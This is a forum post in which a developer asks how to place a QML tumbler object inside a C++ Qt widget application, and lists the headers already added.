Histograms tabs. But they don’t. This is because we still to write these results to our event writer. And this turns out to be a little complicated. First, before we start training, we have to create a tensor representing all our summaries.
logGraph eventWriter createModel summaryTensor <- build mergeAllSummaries
Now if we had no placeholders, we could run this tensor whenever we wanted, and it would output the values. But our summary tensors depend on the input placeholders, which complicates the matter. So here’s what we’ll do. We’ll only write out the summaries when we check our error rate (every 100 steps). To do this, we have to change our error rate in the model to take the summary tensor as an extra argument. We’ll also have it add a
ByteString as a return value to the original
Float.
data Model = Model { train :: TensorData Float -> TensorData Int64 -> Session () , errorRate :: TensorData Float -> TensorData Int64 -> SummaryTensor -> Session (Float, ByteString) }
Within our model definition, we’ll use this extra parameter. It will run both the
errorRate_ tensor AND the summary tensor together with the feeds:
return $ Model , train = ... , errorRate = \inputFeed outputFeed summaryTensor -> do (errorTensorResult, summaryTensorResult) <- runWithFeeds [ feed inputs inputFeed , feed outputs outputFeed ] (errorRate_, summaryTensor) return (unScalar errorTensorResult, unScalar summaryTensorResult)
Now we need to modify our calls to
errorRate below. We’ll pass the summary tensor as an argument, and get the bytes as output. We’ll write it to our event writer (after decoding), and then we’ll be done!
--, summaryBytes) <- (errorRate model) trainingInputs trainingOutputs summaryTensor let summary = decodeMessageOrDie summaryBytes liftIO $ putStrLn $ "Current training error " ++ show (err * 100) logSummary eventWriter (fromIntegral i) summary liftIO $ putStrLn "" -- Testing let (testingInputs, testingOutputs) = convertRecordsToTensorData testRecords (testingError, _) <- (errorRate model) testingInputs testingOutputs summaryTensor liftIO $ putStrLn $ "test error " ++ show (testingError * 100)
Now we can see what our summaries look like by running tensor board again!
Scalar Summary of our Error Rate
Histogram summary of our final weights.
Annotating our Graph
Now let’s look back to our graph. It’s still a bit confusing. We can clean it up a lot by creating “name scopes”. A name scope is part of the graph that we set aside under a single name. When Tensor Board generates our graph, it will create one big block for the scope. We can then zoom in and examine the individual nodes if we want.
We’ll make three different scopes. First, we’ll make a scope for each of the hidden layers of our neural network. This is quite easy, since we already have a function for creating these. All we have to do is make the function take an extra parameter for the name of the scope we want. Then we wrap the whole function within the
withNameScope function.
buildNNLayer :: Int64 -> Int64 -> Tensor v Float -> Text -> Build (Variable Float, Variable Float, Tensor Build Float) buildNNLayer inputSize outputSize input layerName = withNameScope layerName $ do weights <- truncatedNormal (vector [inputSize, outputSize]) >>= initializedVariable bias <- truncatedNormal (vector [outputSize]) >>= initializedVariable let results = (input `matMul` readValue weights) `add` readValue bias return (weights, bias, results)
We supply our name further down in the code:
(hiddenWeights, hiddenBiases, hiddenResults) <- buildNNLayer irisFeatures numHiddenUnits inputs "layer1" let rectifiedHiddenResults = relu hiddenResults (finalWeights, finalBiases, finalResults) <- buildNNLayer numHiddenUnits irisLabels rectifiedHiddenResults "layer2"
Now we’ll add a scope around all our error calculations. First, we combine these into an action wrapped in
withNameScope. Then, observing that we need the
errorRate_ and
train_ steps, we return those from the block. That’s it!
(errorRate_, train_) <- withNameScope "error_calculation" $ do actualOutput <- render $ cast $ argMax finalResults (scalar (1 :: Int64)) let correctPredictions = equal actualOutput outputs er <- render $ 1 - (reduceMean (cast correctPredictions)) scalarSummary "Error" er let outputVectors = oneHot outputs (fromIntegral irisLabels) 1 0 let loss = reduceMean $ fst $ softmaxCrossEntropyWithLogits finalResults outputVectors let params = [hiddenWeights, hiddenBiases, finalWeights, finalBiases] tr <- minimizeWith adam loss params return (er, tr)
Now when we look at our graph, we see that it’s divided into three parts: our two layers, and our error calculation. All the information flows among these three parts (as well as the "Adam" optimizer portion).
Much Better
Conclusion
By default, Tensor Board graphs can look a little messy. But by adding a little more information to the nodes and using scopes, you can paint a much clearer picture. You can see how the data flows from one end of the application to the other. We can also use summaries to track important information about our graph. We’ll use this most often for the loss function or error rate. Hopefully, we'll see it decline over time.
Next week we’ll add some more complexity to our neural networks. We'll see new tensors for convolution and max pooling. This will allow us to solve the more difficult MNIST digit recognition problem. Stay tuned!
If you’re itching to try out some Tensor Board functionality for yourself, check out our in-depth Tensor Flow guide. It goes into more detail about the practical aspects of using this library. If you want to get the Haskell Tensor Flow library running on your local machine, check it out! Trust me, it's a little complicated, unless you're a Stack wizard already!
And if this is your first exposure to Haskell, try it out! Take a look at our guide to getting started with the language!
|
https://mmhaskell.com/blog/2017/8/28/putting-the-flow-in-tensor-flow
|
CC-MAIN-2018-51
|
refinedweb
| 1,475
| 55.64
|
Orbeon review jobs
I need a Java OSS project installed to demo it. The Project is Orbeon forms ([login to view URL]) and I have a trial license file to install the PE version ([login to view URL]). I'll provide you with new VPS to work on, If you can complete today please reply with your proposed price. Thanks, Mika
I am looking for senior Orbeon expert with solid experience in Orbeon xform builder, Orbeon integration with MySQL, Orbeon FormRunner , Wizzard view, Orbeon integration with web service, You have to be able to connect with Skype or teamviewer to participate in problem solving and analysis and help developers to proceed. Please send me your hourly rate
Do zrealizowania zaawansowany kreator formularzy oparty o XForms (np. Orbeon Forms), dla aplikacji w PHP5. Możliwość tworzenia dokumentu - formularza na podstawie wzoru (nagłówki, stopki,tabele, opisy itp) na przykład formularz VAT7, dodatkowo obsługa walidacji użytkownika innych niż zapewnione przez XForms
Need a Orbeon Form Developer do develop an online form platform
The api should be able to be told how many clones it would like to make and create the clones in 12 second intervals and be given sequential ordering of the clones once ...would like to make and create the clones in 12 second intervals and be given sequential ordering of the clones once created. The clones will be of a form template created in Orbeon.
you must have the development skills to use Orbeon Forms to custom make webforms adding ''signature inscribing writing ability onto the webforms. orbeon uses Java, Scala, JavaScript, CoffeeScript, XForms, XSLT, and XML technologies. you must be able to customise orbeon forms according to my liking in the back-end
...extending our Alfresco 4.2 CE portal and adding some additional functionality. This consists of integrating an XForms system with the existing Alfresco site/database (i.e. Orbeon persistence layer) , customizing some existing Alfresco Add-Ons (Survey's / Multi Question Polls) and creating some custom workflows (Conditional workflows based on user actions)
...org/MarkUp/Forms/ <[login to view URL]> Maybe you can find inspiration in the Orbeon forms implementation (JAva available on github) <[login to view URL]> <[login to view URL]> <[login to view URL]> I would like it to be seamless if
...server with MySql database as well as Orbeon is required to be installed on server and as a Liferay portlet. Spagic must work with orbeon forms that too within Liferay. The provider must have the experience of deploying Spagic with Mysql, Orbeon as Liferay portlet and also in configuring spagic to work with orbeon forms within liferay portlet. So proper
I am short on time and need to prepare a powerpoint presentation of XForms interacting with a jBMP workflow running in JBoss. The presentation should create a Orbeon form from scratch showing off the different options there are in the XForms editor. Also with regards to CSS stylesheets ... field dependencies, validations ... Form should minimum contain
We need help to install the XForms tool Orbeon on our server. We will take a look at the product to see if we can use the product to develop forms for our customers.
...there that might fill part of Sharepoint functionality. Alfresco (doc management) offers network shares saving (not integrated into office filesave though) Liferay (portal) Orbeon for Forms funtionality Pentaho for BI and reporting SugarCrm for data entry/lists So it is actually possibly to build similar functionality using OOS components, as I have
I need someone to install and configure the LifeRay portal ([login to view URL]) on my virtual server (Java, Tom...we learn from the experience and can do it again ourselves at additional domains. It is very likely we will need Portlet help in the future. We already know that the Orbeon xForms portlet, which we require, is not working at this point.
Experience and Skills required: XForms Orbeon Forms Apache Tomcat application server Apache Tomcat authentication experience eXist native XML database REST XQuery XPath XSLT XHTML XML namespaces CSS Very Basic Description: Take an existing, bare-bones
|
https://www.br.freelancer.com/job-search/orbeon-review/
|
CC-MAIN-2018-51
|
refinedweb
| 675
| 50.46
|
My friend Jacob Lundqvist of Galdrion today showed me a nifty little method I did not know about in Python, namely the
inspect module. It allows you to find out what the name of the method was that called the method "you're in". Allow me to show an example:
import inspect def foo(): caller_module = inspect.stack()[1][1] caller_method = inspect.stack()[1][3] print caller_module, caller_method return "Something" def bar(): foo() if __name__=='__main__': bar()
And the result is:
>>> C:\Python23\dummy.py bar
I now use this in an internal debug method that prints all SQL statements used before being executed. Every method that needs to execute some SQL will always first send it's SQL statement to the debug method. The debug method can now also show where the SQL came from. Great!
Follow @peterbe on Twitter
Credits where its due ;)
I got it in my turtn from this article:
Four score and seven minutes ago, I read a sweet artlice. Lol thanks
|
https://api.minimalcss.app/plog/blogitem-040816-1
|
CC-MAIN-2020-10
|
refinedweb
| 166
| 71.04
|
Unlike JDK 1.4, Tiger isn't just a set of new standard librariesit features actual changes to the language itself. Generics is the most profound of these changes. Long a part of advanced academic languages, this new feature is a welcome addition to Java.
This article introduces the new generics feature by examining Sun's example pre-release implementation. It demonstrates how to use generics in a sample program, an extensible networked multimedia framework (NMF). Finally, it goes over using generics in the Collections classes.
What Is Generics?
Generics is very similar to C++ templates, both in syntax and semantics. However, like most things in Java that are similar to C++, it is simpler. Since generics has a clear syntax, the following quick example will go a long way in explaining it:
public class Mailbox<Thing>
{
private Thing thing;
// ...
}
This is a fragment from the source code for NMF. The first thing you should notice is the "<Thing>" following the class name. This is a type parameter, which says you can create variations of the Mailbox class by providing different types to take the place of Thing. This means that Mailbox is a parametric class, a class that takes one or more parameters.
<Thing>
Mailbox
Thing
Thing isn't really a type or classyou haven't created a file called Thing.java that contains a class definition for Thing. Rather, you'll have to supply something to
take the place of Thing. Here's how you instantiate the parametric class:
Thing.java
Mailbox<String> myMailbox = new Mailbox<String>();
Now Mailbox<String> clearly is the full name for a Java type. It means "the Mailbox class, with Thing replaced by String." You could also use Mailbox<URL>, which would be "the Mailbox class, with Thing replaced by URL."
Mailbox<String>
String
Mailbox<URL>
URL
In NMF, a Mailbox is an object that lets you send and receive messages of different types. A Mailbox<URL>, for example, lets you send and receive URLs, while a Mailbox<String> lets you send and receive Strings.
The nice thing about this is that you don't have to create two different classes to send and receive two different kinds of messages. Instead, you can create a single class, parameterized by the type variable Thing. You simply program this class to send and receive Things. Instantiating the Mailbox class with various types replaces the Thing type variable with actual types such as String and URL.
Please enable Javascript in your browser, before you post the comment! Now Javascript is disabled.
Your name/nickname
Your email
WebSite
Subject
(Maximum characters: 1200). You have 1200 characters left.
|
http://www.devx.com/Java/Article/16024
|
CC-MAIN-2016-26
|
refinedweb
| 440
| 66.64
|
After a long hiatus, we shall once again emerge from the shadowy depths of the internet to build an exploit. This time, we'll be looking at how to defeat a non-executable stack by using the ret2libc technique — a lean, mean, and brilliant way of exploiting a stack overflow vulnerability.
Since it has been so long since we last built an exploit together, it might be a good idea to review a few key topics to developing exploits, such as what a stack overflow vulnerability is and what is the instruction pointer. So make sure to go over that stuff below before jumping to Step 1 of this exploit development tutorial.
What Is a Stack Overflow Vulnerability?
A stack overflow vulnerability occurs when a program improperly allocates memory for a variable on the stack. For instance, let's say we set aside 16 bytes of memory for a variable called "movieName." We spend hours devising an intuitive system where users can enter in the name of a movie to store it in this variable, and it looks beautiful. We have created the most gorgeous input box known to man.
This input we created becomes useless, however, because we completely forget to check if the user is inputting a movie name that is longer than 16 bytes (or 16 characters). One user inputs an obnoxiously long title such as "The Emperor's New Groove," and our whole program breaks! This happens because the user input exceeds the 16 bytes of memory we allocated for it and overflows into memory meant to contain other variables or data. Gross.
As a hacker, however, these sorts of vulnerabilities can be super useful. If we can keep track of what data we're overwriting, and what new data we are replacing it with, we could gain a lot of control. Enter the instruction pointer.
What Is the Instruction Pointer?
The instruction pointer, also known as EIP, contains the memory address of the next instruction to execute. If we were able to overwrite EIP with our own memory address, we could redirect code execution of the entire program. That sounds like fun. Of course, we can't review everything we've learned so far here, so check out the article linked below to re-learn the fundamental ideas that you'll need to finish this tutorial.
What's the Catch?
Of course, most programmers don't just say "oh well" and let us ruin their programs. Different strategies for protecting against stack overflow vulnerabilities have been devised. One particular strategy is to make sure the program knows not to execute any instructions that are located somewhere on the stack. This is a problem for us.
Thankfully, our dear friend Protostar, the virtual machine, has an exploit development challenge that will help us learn how to get around this. Let's take a look at the stack6 level on Protostar and see what we can learn!
Step 1: Taking a Look at the Source Code
As always, the first thing we should do is take a look at the source code on Exploit Exercises to see what we're up against:
Let's break this code down line by line:
- In lines 8 and 9, we see two variables defined. The first one is an array of characters named "buffer" which is given a size of 64 bytes. This means it can hold at most 64 characters. This is good to know. Next, we see an integer named "ret" defined. We haven't seen a variable like this in previous exercises before, so it'll be interesting to see what this is used for.
- In line 11, the program prompts the user for input, and on line 13 this input is passed to the buffer variable. Notice how the program doesn't check to see if the user input will fit inside the 64 bytes given to buffer. That's pretty dumb but really good for us so we won't tell the programmer. Shh.
- Now, in line 15, the variable ret pops up again. This is actually an assignment statement. The __builtin_return_address(0) refers to EIP. It turns out this line is storing the value of EIP into the ret variable. Why on earth would the programmer be doing that? ...
- Well, in line 17, we find out, and as attackers, the answer isn't good. Line 17 holds what seems to be a cryptic "if" statement. This if statement is using what is called a bitwise operator to check if the address written to the instruction pointer starts with the byte "0xbf." If the address does start with this byte, the program stops the execution.
Well, that's not good. Maybe the programmer isn't so dumb after all. Essentially, this means that we can't overwrite EIP with any address that starts with "0xbf." This is a problem because, in this challenge, any shellcode we could write will always be located in a memory address that starts with "0xbf." How in the heck are we going to exploit this program then? We'll worry about what we're going to overwrite EIP with later. For now, let's just start with actually overwriting EIP with anything at all.
Step 2: Building the Framework of Our Exploit
Let's SSH into the Protostar VM and get cracking. If you don't already have Protostar installed, check out our guide on how to install Protostar as a virtual machine.
Once Protostar is all set up, use your favorite SSH client to log in. The username to log in is user and the password is also user. Once we're logged in, let's spruce up our terminal prompt a little bit. By default, Protostar serves us a /bin/sh shell for us, but this can be sort of limiting. We want a fully featured, glorious /bin/bash prompt instead. To get one, type:
bash
Simple as that. Now let's open up a new file by typing the following command:
nano exploit.py
After that, we'll build the framework for our exploit by typing the code in the screenshot below.
- As always, the first line is optional. All it does is tell the OS that when this program is executed, it should be executed as a Python script. While this line enables us to execute the script directly, it is not needed to run the script via the python command.
- The next two lines import the struct and os packages for use in our program. We'll use struct later, but we'll need the os package right away.
- Next, we define our main function. Here we start by defining an integer called padding. This variable will determine how long we make our buffer overflow. As we can see on the next line, we store our payload variable first with the letter "A" multiplied by our padding variable. This means if padding is 4, we end up with 4 A's in our exploit.
- The next three lines are new to this series. Instead of using the echo command to pass our payload to a text file, we are going to use Python's file I/O to get the job done. The reason we're doing this is because certain memory addresses create problems when they are passed directly to the shell.
Once we open, write to, and close our payload.txt file, we are ready to pass the payload to the vulnerable program. This can be done right in the shell, so we use the os.system command to do this. We first use the cat command to read the contents of payload.txt to standard output, then we use the pipe ("|") command to redirect standard output to the standard input of the vulnerable stack6 program.
Let's save this, run the program and see what happens:
Well, we didn't see any terribly exciting output, but this is a nice confirmation. The framework of our exploit works. Now it's time to jump back into the fray and indulge in the delicious world of the GNU debugger (GDB).
Step 3: Using GDB to Determine the Size of Our Exploit
The quickest way for us to determine how large our exploit needs to be is by looking at the memory of the program. Let's hop into GDB and take a peak. To do this, we type:
gdb /opt/protostar/bin/stack6
Doing so should result in output that looks similar to the screenshot below.
Once GDB has started up, we need to set a breakpoint. This breakpoint will stop execution at a certain point so that we can identify the values of variables and registers at that instant. Looking back at the source code, line 22 seems like a good candidate. This is because at this point the program has already received and processed the input from the user, but hasn't printed the user input yet. We don't really want to see the user input because once we start inserting memory addresses into our payload, the whole thing will look really messy. For the sake of organization, it makes sense to break before this happens.
To set a breakpoint at line 22, we type:
break 22
Pretty simple. Now it's time to run the program. In order to run the program and pass it our current payload from inside GDB, we'll have to type:
run < payload.txt
At this point, our screen should look something like this:
As you can see, we've hit our breakpoint and can begin looking at memory. Specifically, we are going to want to look at the current stack frame. This is where our payload will be, as well as the instruction pointer. In order to do this, we'll type:
x/32x $esp the memory at the very beginning of the current stack frame.
Let's see what output we get from this command:
Well, would you look at that. ... We've found our A's! They were right where we left them in the stack frame. We can see here that our four A's start at the memory location 0xbffff77c and fill through 0xbffff77f. This is really useful. Now that we know where our payload starts, all we need to do is figure out where the instruction pointer is. Then we will be able to determine how long our payload should be.
This is very trivial for us. In order to locate the instruction pointer, all we have to do is type:
info frame
In addition to giving us information about the instruction pointer, we'll also see other information about the current stack frame with this command. For our purposes, however, this information is extraneous and not needed. Let's take a look at the output we get from this command:
Lo and behold, we have precisely just what we need. By running the info frame command, we can now see that the instruction pointer is located at the memory address 0xbffff7cc (highlighted in red) and contains the address 0x08048505 (highlighted in green). This isn't too far from the start of our payload. In fact, we can figure out just how far apart those two addresses are by typing the following command.
p 0xbffff7cc - 0xbffff77c
Typing this gives us a result of 80. This means we need a total of 80 A's as padding to overflow memory right up to EIP. While 80 A's won't actually overwrite EIP, it will be one byte away from doing so. Let's test that theory.
Step 4: Modifying Our Exploit
We can exit GDB by typing the command quit. Once we've done that, let's hop back into our exploit by typing nano exploit.py. Let's change the value of our padding variable from 4 to 80 and see what the memory looks like in GDB.
Once the padding variable has been modified, save and close exploit.py. Let's run the exploit and see what happens:
Well, that is absolutely bizarre. Not only does the program output appear twice, but we have some weird stuff happening to our PuTTY prompt. If you are using a program other than PuTTY, your output might look different, but it's probably still very weird. Most notably, we seem to have caused a segmentation fault in the program. Usually, this indicates that we actually overwrote the instruction pointer. That wouldn't make sense, though, since we just did the math. Let's look at another GDB memory dump and see what we find:
Repeating the same steps as earlier, we're able to see a memory dump of the stack frame with our new payload. Sure enough, we have filled the memory with just enough A's to bring us next to EIP without messing with it. That segmentation fault we saw earlier must be caused by a different breakdown in the program's logic by our exploit. This shouldn't impact our exploit itself though.
Step 5: Understanding the ret2libc Technique
If you've been following this tutorial series, much of this is most likely review for you. You've interacted with GDB, looked over source code, and pushed more A's around than you'd care to admit. You're ready for the new stuff, and new stuff you shall get. Let's finally walk through what the ret2libc technique actually is.
Finding Something Useful in the Program
Essentially, the problem we're faced with is this: In order to get a shell in the past, we have written shellcode inside a variable and overwritten the instruction pointer with an address that would eventually point to this shellcode. In this challenge, we can't point EIP anywhere near where we can put shellcode. With this in mind, where on earth do we redirect EIP to? The answer is simple: We redirect EIP to system.
What Is System?
Believe it or not, you've already created a system call. If we look at our current exploit, at the very end we use a function called os.system which passes an argument as a system command. We can do the very same thing inside of our vulnerable program. If we were to give EIP the address of the system function, we could tell the system to execute /bin/sh and bless us with a shell.
How Can We Do This?
In order to successfully execute the system function, we have to follow a certain template in our exploit that looks something like this:
The reason this order is required has to do with the function prologue of the system function. Essentially, this is the part of the function that sets up the stack frame the function will use. This includes making sure that arguments are passed to the function correctly.
The first argument for the system function occurs four bytes after the initial call to the function. How all of this works has a lot to do with the actual assembly instructions, which we won't get into. For now, just know that we need an extra four dummy bytes after the address of system in order for the function to correctly read the address of our string.
The Kicker
We can't actually just pass "/bin/sh" in our exploit. The system function takes a pointer to a string, not a string itself. This means that we store the string "/bin/sh" somewhere else in memory and pass the memory address to the system function. This can be a bit annoying, but we'll shove that into the corner and pretend it's not there — for now. Let's focus on the next step: Obtaining the address of system.
Step 6: Find the Address of System in Memory
Finding the address of system is actually a pretty straightforward process in GDB. Let's jump back into GDB and reset our breakpoint again. Once that's done, we'll type run to start the program. We don't need to pass our payload this time because we aren't concerned with looking at memory. Instead, feel free to just type whatever you want into the program's prompt, and hit enter. Doing so will trigger the breakpoint.
Once we've hit the breakpoint, we need to type the following command.
p system
This will print out information about the system function, including its address. In the above image, the address of system is highlighted in red. Write that address down somewhere — we're going to need it soon.
Step 7: Implementing a Call to System in Our Exploit
Let's exit out of GDB and open our exploit, which will now look something like this:
We've changed two things here: First, on line 7, we've created a new variable called system_addr. As you may have guessed, this will hold the address of system. Like we've done in the past, we'll use the handy-dandy struct.pack function to package the address of system in the correct format. We then append this address to the end of the payload string, followed by the four dummy bytes we saw in our diagram earlier.
If we saved and ran the exploit at this point, we wouldn't really see anything exciting. In fact, the exploit would behave exactly the same as it had before we made these new changes. The reason for this is because we haven't passed any real arguments to system yet. The Python equivalent of our current exploit would be this:
os.system("")
That sucks. That's boring. That's going to change. Our next mission is to find a string somewhere in the program that contains "/bin/sh." This will be a grind.
Step 8: Hunting for /bin/sh
At first glance, looking for the string "/bin/sh" inside a program seems to be a bit of a wild goose chase. Why would that string exist in the stack6 program? That's a great question because the string won't actually be incoming from the program. We'll find our target string in the environmental variables of our current shell session.
Don't believe me? Let's type the following command and see.
env
BOOM. There it is. This variable, along with every other environmental variable, is loaded into every program that is run from this shell. If we can find where in memory this string is, we can use it as the argument to our system call. Finding it won't be easy though.
We might as well get started, so let's open GDB back up and start searching. Once again, we'll set a breakpoint at line 22 and run the program. Passing payload.txt as input is not necessary this time.
Once we hit our breakpoint, we're going to type something a little different. Take a look at the following command:
x/s *(environ)
It looks intimidating, but we'll break it down.
The first part should look familiar. The x at the very beginning tells us that we are using the examine command that we know and love. Instead of passing /x, however, we pass /s as the first argument. This means that instead of examining the data in hexadecimal format, we want to examine the data as a string. We do this because it would be really hard to identify the string "SHELL=/bin/sh" in hexadecimal format.
The last portion of the command is the most arcane looking. Let's actually start by defining what the term environ means. Here, environ is a pointer to a pointer for the environmental variables of a program. As obnoxiously abstract as that sounds, essentially what that means is that environ contains a memory address which points to another memory address. In this second memory address, the starting address of the environmental variables is stored.
We don't want the pointer address, though, we want the address of the environmental variables. To get this, we have to dereference the pointer. When we dereference a pointer, we grab the value from the memory address that is stored in the pointer. This is a common idea in the C programming language, but it can be tricky to understand at first. Take a look at the diagram below for an explanation of what's going on.
Essentially, the environ variable contains a memory address. This is similar to the system_addr variable in our exploit. The value stored at that memory address is another memory address. This value is the address of the environmental variables. While this seems convoluted, it allows us to quickly iterate through the environmental variables in the program until we find the one we want, like so:
x/s *(environ+1)
This will show us the second environmental variable in memory, regardless of how long the first one is. This makes digging through the memory much easier. All we have to do is keep incrementing our addition to environ until we find the SHELL variable like so:
Bingo. The address of /bin/sh. Well, sort of. In the above screenshot, the address 0xbfffff88 points to the string "SHELL=/bin/sh." We only want "/bin/sh." This is a simple fix though. All we have to do is add 6 to the address when we pack it in our exploit. No problem. Let's add this address to our exploit and see what happens!
Step 9: Adding the Pointer to /bin/sh to Our Exploit
Now that we have this address, our exploit should look something like this:
As you can see we've added a variable called shell_addr. We slap this on the back of our payload string to finish implementing the exploit template we looked at earlier. Let's save our exploit and see what happens!
Step 10: Testing Our Exploit
After all of our hard work, it appears we're done. It's time to bask in our glorious new exploit and pop a root shell on stack6. Let's see it!
What? What happened? We did everything right. We found the address of system, the address of /bin/sh, and put them all together correctly. Why did this exploit not work?
Well, there's a couple reasons. Let's start with the first one: We didn't actually find the correct address of /bin/sh. We found the address when the program is running inside GDB. The address of /bin/sh changes outside the debugger. So how do we find the real address of /bin/sh?
Step 11: Returning to the Hunt
The first thing we could try to do is guess the address of /bin/sh, but that might take awhile. While the address we have from GDB is somewhat close, it will still take a lot of guessing to find what we want.
Determining exactly where the string /bin/sh might be in memory is possible, but complicated. We could write another tutorial for just that. However, we can still get closer than we actually are. If we can print the address of SHELL from a similar executable we create ourselves, we could get closer to finding the real slim SHELL. Let's open up a new file in nano by typing:
nano find_env.c
In case you're wondering, yes, we will be writing a simple C program. It's the only way to do this. I promise it won't be that bad though. Let's take a look:
See? It's not so bad! Just a couple lines. The first line defines a pointer which stores the address of the SHELL variable. The second line prints it. Simple. To compile this program, type:
gcc find_env.c
Once the program is compiled, it will be saved as an executable called a.out. To run a.out, type:
./a.out
You should see the following:
Alright, now we're getting closer. Our program is telling us that in the a.out program, SHELL is located at 0xbfffff9de. We can be pretty confident this is an underestimate because our program is far simpler than stack6.c. The address will still be close though.
Let's make some edits to our exploit:
We make two changes here: First, we modify the address of shell to our closer estimate. The second change, however, comes in the system call on the last line of main. As you can see, cat payload.txt has become (cat payload.txt; cat).
As some of you might recall in our last stack overflow tutorial, running /bin/sh from an exploit can be tricky. This is because the standard output can close as soon as it opens. To make sure we're not missing the correct address, we've kept the standard input and output open with a call to the cat command.
Alright! From here, it really is just Guess City. Luckily for you, I've already done the guessing for you. Our estimate was still 1,465 bytes early from the actual address of SHELL. That means the final exploit will look something like this:
Run that bad boy, and you should end up with a shell like this:
Final Thoughts
While this exploit is good, it isn't perfect. As you play around with your nice new shell, you'll notice that when you type the exit command, you end up with a segmentation fault. That isn't very clean. The reason is this: After the system call we pass finishes execution, the instruction pointer goes to the next address. Remember what we set that to? That's right, AAAA. That will always cause a crash. It sure would be nice if there was a way to exit a little more nicely, but I'll leave that as an exercise for you to do on your own.
Thank you for reading! Congratulations on making it through the slow grind. Comment below with any questions or contact me via Twitter @xAllegiance if you need help.
6 Comments
This is great and you are great.
Well thank you sir :)
Hi
Thnx for your idea sharing
i want to make a simple hack but i want some idea u can help me how to be a hacker coz i love this but one hacker need to have a good idea for programing but me i hate programing coz have alot comands can u help me , if someone can send me a mesage please
Hi! Happy to share.
Unfortunately, if you're not willing to learn programming, a lot of what goes on in cyber security will be difficult to understand. You'll be able to conduct simple penetration testing, but that's it. I would urge you to reconsider your stance on programming.
can u help me i see alot of video in youtube
i know all idiots share fake video
but i will try to getso some info fromm al videos and from all people
can u help me plz
// C++ Implementation for drawing line
#include <graphics.h>
// driver code();
}
Share Your Thoughts
|
https://null-byte.wonderhowto.com/how-to/exploit-development-defeat-non-executable-stack-with-ret2libc-0183260/
|
CC-MAIN-2018-39
|
refinedweb
| 4,522
| 73.27
|
iVisibilityCuller Struct Reference
[Visibility]
This interface represents a visibility culling system. More...
#include <iengine/viscull.h>
Detailed Description
This interface represents a visibility culling system.
To use it you first register visibility objects (which are all the objects for which you want to test visibility) to this culler. A visibility culler can usually also support shadow calculation.
Main creators of instances implementing this interface:
- Dynavis culler plugin (crystalspace.culling.dynavis)
- Frustvis culler plugin (crystalspace.culling.frustvis)
Main ways to get pointers to this interface:
Main users of this interface:
Definition at line 101 of file viscull.h.
Member Function Documentation
Start casting shadows from a given point in space.
What this will do is traverse all objects registered to the visibility culler. If some object implements iShadowCaster then this function will use the shadows casted by that object and put them in the frustum view. This function will then also call the object function which is assigned to iFrustumView. That object function will (for example) call iShadowReceiver->CastShadows() to cast the collected shadows on the shadow receiver.
Intersect a segment with all objects in the visibility culler and return them all in an iterator.
If accurate is true then a more accurate (and slower) method is used.
Intersect a beam using this culler and return the intersection point, the mesh and optional polygon index.
If the returned mesh is 0 then this means that the object belonging to the culler itself was hit. Some meshes don't support returning polygon indices in which case that field will always be -1. If accurate is false then a less accurate (and faster) method is used. In that case the polygon index will never be filled.
Intersect a segment with all objects in the visibility culler and return them all in an iterator.
This function is less accurate then IntersectSegment() because it might also return objects that are not even hit by the beam but just close to it.
Parse a document node with additional parameters for this culler.
Returns error message on error or 0 otherwise.
Precache visibility culling.
This can be useful in case you want to ensure that render speed doesn't get any hickups as soon as a portal to this sector becomes visible. iEngine->PrecacheDraw() will call this function.
Register a visibility object with this culler.
If this visibility object also supports iShadowCaster and this visibility culler supports shadow casting then it will automatically get registered as a shadow caster as well. Same for iShadowReceiver.
Setup all data for this visibility culler.
This needs to be called before the culler is used for the first time. The given name will be used to cache the data.
Unregister a visibility object with this culler.
Mark all objects as visible that intersect with the given bounding sphere.
Notify the visibility callback of all objects that are in the volume formed by the set of planes.
Can be used for frustum intersection, box intersection, ....
- Remarks:
- Warning! This function can only use up to 32 planes.
Do the visibility test from a given viewpoint.
This will first clear the visible flag on all registered objects and then it will mark all visible objects. If this function returns false then all objects are visible.
Notify the visibility callback of all objects that intersect with the given bounding sphere.
Mark all objects as visible that are in the volume formed by the set of planes.
Can be used for frustum intersection, box intersection, .... Warning! This function can only use up to 32 planes.
Mark all objects as visible that intersect with the given bounding box.
The documentation for this struct was generated from the following file:
Generated for Crystal Space 1.4.1 by doxygen 1.7.1
|
http://www.crystalspace3d.org/docs/online/api-1.4/structiVisibilityCuller.html
|
CC-MAIN-2014-49
|
refinedweb
| 624
| 58.28
|
MultiMail 2.0 is a multi-threaded SMTP stress testing program which also doubles up as a handy
tool for anti-Spam software development. It starts multiple threads, each sending
a large number of mails in parallel to a specified SMTP server. MultiMail 2.0 is
freeware and can be used by anyone without the author's explicit permission.
I wrote the first version while I was developing my own anti-Spam program Pop 3 Protector
(discontinued). I used it to bombard test POP accounts with a large amount of
email from multiple fake email addresses and with multiple subject headers.
A few months ago [here the current time is Feb 2002], I was asked to try out three different Linux based SMTP
servers and decide on the fastest one. That's when I got a chance to use this
tool once again. I sent huge amounts of mail through each server and recorded
connection and mail delivery speeds. To increase the load I made the program
multi-threaded. The user can set the number of threads to use. In this
particular version I have restricted this number to 10, to prevent malicious
people from misusing this program. But for anyone who wants to
use this as an SMTP stress tester, 10 threads running in parallel, each thread
sending 1000 mails each, should be quite good enough.
Actually there is a sneaky way to over-ride the restrictions, which is by
running multiple instances of the program. But for some strange reason I have
noticed that this will considerably slow down the user's machine and I hope that
will deter people from trying it out.
Version 2.0 uses the ATL7 SMTP and MIME classes and so I have removed all my
Winsock-SMTP-chat code from the program. This has enabled me to add support for
attachments which is quite handy.
#include <span class="code-keyword"><atlsmtpconnection.h></span>
CoInitialize
CoInitialize(0);
CMimeMessage msg;
msg.SetSender(strSender);
msg.AddRecipient(strRecepient);
//Optional
msg.SetSubject(strSubject);
msg.AddText(strBody);
msg.AttachFile(strAttachFile);
CSMTPConnection conn;
conn.Connect(server);
BOOL bSuccess = conn.SendMessage(msg);
conn.Disconnect();
CoUninitialize
CoUninitial
|
http://www.codeproject.com/Articles/1873/MultiMail-2-0-Freeware-SMTP-stress-testing-tool?fid=3335&fr=26
|
CC-MAIN-2013-48
|
refinedweb
| 356
| 65.12
|
Add QML objects to your C++ widget application.
My company's High Command has ordered me to develop a tumbler.
This tumbler or rrrrrrrr-thing as we call it is a QML type object. And I have no experience with QML. I have already googled some stuff but I can't find how to add a QML object to the rest of my application.
I do know:
- I have to use a QGraphicView widget. I already have one of those in use with some extra space left. (I'm using Qt 5.8)
- I must include: #include <QtQuick/QQuickView> and #include <QtQml/QQmlEngine> in the header file
- I must make a new QML file.
What I don't know:
- how can I make a QML object in my cpp file and give it a place on my QGraphicView?
Hm so far for the need of a QGraphicView :)
I have done:
- added to header.
#include <QtQuickWidgets/QQuickWidget>
- added to header
